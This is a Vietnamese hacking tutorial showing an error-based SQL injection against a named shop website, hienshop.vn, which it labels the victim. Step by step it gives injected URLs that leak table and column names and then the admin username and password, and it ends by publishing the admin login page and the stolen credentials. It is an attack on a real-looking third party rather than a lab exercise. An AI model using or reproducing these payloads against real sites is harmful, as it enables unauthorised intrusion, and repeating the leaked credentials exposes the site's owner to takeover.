Hướng Dẫn Tấn công ASPX qua SQLi

Hướng Dẫn Tấn công ASPX qua SQLi

Tut Tấn công ASPX qua SQLi

Victim: http://www.hienshop.vn/

--------------------------------------------------
http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables))/Default.aspx

Conversion failed when converting the nvarchar value 'tblCategory' to data type int.
=>> tblCategory
---------------------------------------------------
Có được "tblCategory" ta thay tiếp vào để lấy table tiếp theo

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory')))/Default.aspx

Conversion failed when converting the nvarchar value 'tblComment' to data type int.
=>> tblComment
-------------------------------------------------
Có được "tblComment" ta lại thay vào tiếp như thế này

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment')))/Default.aspx

=>> Ta có "tblfooter"
-------------------------------------------------
Và ta thay tương tự như trên ta có

http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 table_name from information_schema.tables where table_name not in ('tblCategory', 'tblComment', 'tblfooter', 'tbllienhe', 'tblLogo', 'tblNews', 'tblOrder', 'tblOrderDetail')))/Default.aspx

=>> Vâng thông báo rất mất dạy, đéo được quá 260 từ. Thế thì sao, dùng kinh nghiệm đoán Table "thần chưởng". Tui thì đoán cmn đại là tblAdmin.


http://www.hienshop.vn/ProductDetail/1672/198 and 1= convert(int, (select top 1 column_name from information_schema.columns where table_name = 'tblAdmin'))/Default.aspx

CLGT này =>> AdminID
----------------------------------------------
Tới bước lấy thông tin User rồi:
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 UserName from tblAdmin))//Default.aspx

=>> dnlong

Thay chổ "UserName" thành "PassWord"
http://www.hienshop.vn/ProductDetail/1672/198 and 1=convert(int,(select top 1 PassWord from tblAdmin))/Default.aspx

=>> Vẫn là dnlong
----------------------------------------------

Login Admin:

http://www.hienshop.vn/admin/Login.aspx

ID: dnlong
Pass: dnlong

Checked By Anh Hai Sài Gòn, Good Luck

Chat
1